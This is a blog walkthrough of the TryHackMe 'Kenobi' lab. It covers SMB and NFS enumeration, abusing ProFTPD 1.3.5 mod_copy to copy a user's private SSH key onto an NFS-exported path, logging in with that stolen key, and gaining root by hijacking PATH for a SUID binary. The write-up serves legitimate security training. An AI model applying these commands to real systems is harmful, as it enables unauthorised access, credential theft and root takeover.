Kenobi – TryHackMe – Manual Writeup

Reading Time: ( Word Count: )

February 28, 2021
Nextdoorsec-course

Intro

The Kenobi box will cover the following topics:

  • Enumeration of samba shares
  • Manipulation of a vulnerable version of proftpd
  • Path variable manipulation for privilege escalation

Enumeration

Nmap

Initial Nmap scan: 

  ┌──(kali㉿kali)-[~]      └─$ nmap -A -v $IP PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA) | 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA) |_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 1 disallowed entry |_/admin.html |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100003 2,3,4 2049/udp nfs | 100003 2,3,4 2049/udp6 nfs | 100005 1,2,3 40218/udp6 mountd | 100005 1,2,3 43681/tcp6 mountd | 100005 1,2,3 55583/udp mountd | 100005 1,2,3 59803/tcp mountd | 100021 1,3,4 37255/tcp6 nlockmgr | 100021 1,3,4 41993/tcp nlockmgr | 100021 1,3,4 48289/udp nlockmgr | 100021 1,3,4 60413/udp6 nlockmgr | 100227 2,3 2049/tcp nfs_acl | 100227 2,3 2049/tcp6 nfs_acl | 100227 2,3 2049/udp nfs_acl |_ 100227 2,3 2049/udp6 nfs_acl 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 2049/tcp open nfs_acl 2-3 (RPC #100227) Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h59m58s, deviation: 3h27m51s, median: -1s | nbstat: NetBIOS name: KENOBI, NetBIOS user: , NetBIOS MAC: (unknown) | Names: | KENOBI<00> Flags: | KENOBI<03> Flags: | KENOBI<20> Flags: | \x01\x02__MSBROWSE__\x02<01> Flags: | WORKGROUP<00> Flags: | WORKGROUP<1d> Flags: |_ WORKGROUP<1e> Flags: | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: kenobi | NetBIOS computer name: KENOBI\x00 | Domain name: \x00 | FQDN: kenobi |_ System time: 2021-02-24T11:43:11-06:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-02-24T17:43:11 |_ start_date: N/A

The apache server on port 80, ProFTPD’s version on port 21 and Samba shares get my immediate attention.

Nothing valuable on port 80, neither after scanning for other directories/files with gobuster.

Let’s enumerate the smb shares & users with Nmap scripts:

  ┌──(kali㉿kali)-[~]      └─$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP
PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \\10.10.100.215\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (kenobi server (Samba, Ubuntu)) | Users: 2 | Max Users: | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.100.215\anonymous: | Type: STYPE_DISKTREE | Comment: | Users: 0 | Max Users: | Path: C:\home\kenobi\share | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.100.215\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: | Path: C:\var\lib\samba\printers | Anonymous access: |_ Current user access:

It seems like we have read/write access to two of the shares.

Let’s inspect one of the shares:

  ┌──(kali㉿kali)-[~]      └─$ smbclient //$IP/anonymous
smb: \> ls . D 0 Wed Sep 4 12:49:09 2019 .. D 0 Wed Sep 4 12:56:07 2019 log.txt N 12237 Wed Sep 4 12:49:09 2019 9204224 blocks of size 1024. 6877100 blocks available smb: \> get log.txt   ┌──(kali㉿kali)-[~]      └─$ cat log.txt
Generating public/private rsa key pair. Enter file in which to save the key (/home/kenobi/.ssh/id_rsa): Created directory '/home/kenobi/.ssh'. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/kenobi/.ssh/id_rsa. Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub. The key fingerprint is: SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi The key's randomart image is: ...

log.txt contains information about the generation of a private ssh key located in its default directory. It also has information about the ProFTPD service.

NFS

Before starting the exploitation phase, we still have some enumeration to do. Let’s enumerate the network file system (nfs) found on port 111 earlier:

  ┌──(kali㉿kali)-[~]      └─$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP
PORT STATE SERVICE 111/tcp open rpcbind | nfs-showmount: |_ /var *

Now that we know it’s possible to mount the /var directory, let’s keep this in mind and go on with the exploitation phase.

Exploitation

Searchsploit

We’ve found proftpd’s version earlier, let’s check out for potential exploits:

  ┌──(kali㉿kali)-[~]      └─$ searchsploit proftpd 1.3.5
----------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------- --------------------------------- ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt ----------------------------------------------------------- ---------------------------------

The third exploit, “36742.txt”, tells us about using the mod_copy module’s SITE CPFT/SITE CPTO commands. It should allow us to use these commands unauthenticated for copying files/directories from one place to another on the server. Let’s go on and connect with nc to port 21 (ftp).

We know that the FTP service is running as the Kenobi user (from the file on the share), and an ssh key is generated for that user (log.txt). 

  ┌──(kali㉿kali)-[~]      └─$ nc $IP 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.100.215] SITE CPFR /home/kenobi/.ssh/id_rsa 350 File or directory exists, ready for destination name SITE CPTO /var/tmp/id_rsa 250 Copy successful

We can now mount the directory locally and download the previously copied key.

  ┌──(kali㉿kali)-[~]      └─$ sudo mkdir /mnt/kenobiNFS   ┌──(kali㉿kali)-[~]      └─$ sudo mount $IP:/var /mnt/kenobiNFS
  ┌──(kali㉿kali)-[~]      └─$ ls -la /mnt/kenobiNFS total 56 drwxr-xr-x 14 root root 4096 Sep 4 2019 . drwxr-xr-x 3 root root 4096 Feb 26 00:07 .. drwxr-xr-x 2 root root 4096 Sep 4 2019 backups drwxr-xr-x 9 root root 4096 Sep 4 2019 cache drwxrwxrwt 2 root root 4096 Sep 4 2019 crash drwxr-xr-x 40 root root 4096 Sep 4 2019 lib drwxrwsr-x 2 root staff 4096 Apr 12 2016 local lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log drwxrwsr-x 2 root mail 4096 Feb 26 2019 mail drwxr-xr-x 2 root root 4096 Feb 26 2019 opt lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run drwxr-xr-x 2 root root 4096 Jan 29 2019 snap drwxr-xr-x 5 root root 4096 Sep 4 2019 spool drwxrwxrwt 6 root root 4096 Feb 25 23:54 tmp drwxr-xr-x 3 root root 4096 Sep 4 2019 www

We now have a network mount on our target, just like a physically connected device to our pc! We can go to /var/tmp, get the private key, and then log in to Kenobi’s account.

  ┌──(kali㉿kali)-[~]      └─$ cp /mnt/kenobiNFS/tmp/id_rsa .   ┌──(kali㉿kali)-[~]      └─$ sudo chmod 600 id_rsa   ┌──(kali㉿kali)-[~]      └─$ ssh -i id_rsa kenobi@$IP
kenobi@kenobi:~$ whoami kenobi

We always need to give the private ssh keys read/write-only permissions. Otherwise, it won’t work because of security-related issues. Here’re the correct permissions: 
The .ssh directory permissions should be 700 (drwx——).  
The public key (.pub file) should be 644 (-rw-r–r–).
The private key (id_rsa) on the client host, and the authorized_keys file on the server, should be 600 (-rw——-).

Privilege Escalation

SUID

Let’s look for files/programs that have the SUID bit set:

kenobi@kenobi:~$ find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null -rwsr-xr-x 1 root root 94240 May 8 2019 /sbin/mount.nfs -rwsr-xr-x 1 root root 14864 Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-sr-x 1 root root 98440 Jan 29 2019 /usr/lib/snapd/snap-confine -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 428240 Jan 31 2019 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic -rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap -rwsr-xr-x 1 root root 23376 Jan 15 2019 /usr/bin/pkexec -rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap -rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd -rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/bin/menu -rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo -rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh -rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp -rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount -rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount -rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping -rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6

SUID abuse is a common privilege escalation technique that allows us to gain root access by executing a root-owned binary with SUID enabled. An alternative command would be:
find / -perm -u=s -type f 2>/dev/null

You can usually check GTFOBins to see how to abuse the file with the SUID bit set but /usr/bin/menu is a custom made program. Therefore, we can’t find it there. Let’s run it and see what it does:

kenobi@kenobi:~$ /usr/bin/menu
*************************************** 1. status check 2. kernel version 3. ifconfig ** Enter your choice :

It’s executing some simple commands upon choosing. Let’s try and see what happens in the backend with the strings command, which looks for human-readable strings on a binary:

  ┌──(kali㉿kali)-[~]      └─$ strings /usr/bin/menu *************************************** 1. status check 2. kernel version 3. ifconfig ** Enter your choice : curl -I localhost uname -r ifconfig

This shows that the binaries are run without their full path, like not using /usr/bin/curl, /usr/bin/uname or /usr/sbin/ifconfig.

The file itself runs with root privileges, which makes the executed commands run the same way.

kenobi@kenobi:~$ cd /tmp kenobi@kenobi:~$ echo /bin/sh > ifconfig kenobi@kenobi:~$ chmod 777 ifconfig kenobi@kenobi:~$ export PATH=/tmp:$PATH kenobi@kenobi:~$ /usr/bin/menu
*************************************** 1. status check 2. kernel version 3. ifconfig ** Enter your choice :3 # whoami root #

First, we navigate to the tmp path, then echo /bin/sh to a new file called ifconfig. Afterwards, set the correct permissions to our newly created ifconfig. Then we set the PATH variable to the current path (tmp), so /usr/bin/menu will use our PATH variable to find the ifconfig binary.

I hope everything is clear. If not, let me know in the comments below.

Aydan Arabadzha

Aydan Arabadzha

Author

Aydan, a cybersecurity ace and AI visionary, thrives on the frontlines of offensive security. His passion birthed NextdoorSec, a groundbreaking cybersecurity firm. A relentless pioneer, Aydan is persistently pushing boundaries, shaping the future of the digital world one byte at a time.

Other interesting articles

Automated vs Manual Penetration Testing

Automated vs Manual Penetration Testing

Pentesting is largely divided into two methodologies: Automated vs Manual Penetration Testing. Both have ...
8 Steps in Penetration Testing You Should Know

8 Steps in Penetration Testing You Should Know

Mastering the art of penetration testing has become a critical ability for security experts to combat cyber ...
Spear Phishing vs Whaling: What is the Difference

Spear Phishing vs Whaling: What is the Difference

Spear phishing is a particularly devious type of phishing assault in which the individual targeted plays a ...
How Often Should Penetration Testing Be Done

How Often Should Penetration Testing Be Done

Penetration testing is a crucial technique that involves simulating a cyberattack on networks, computer systems, ...
0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *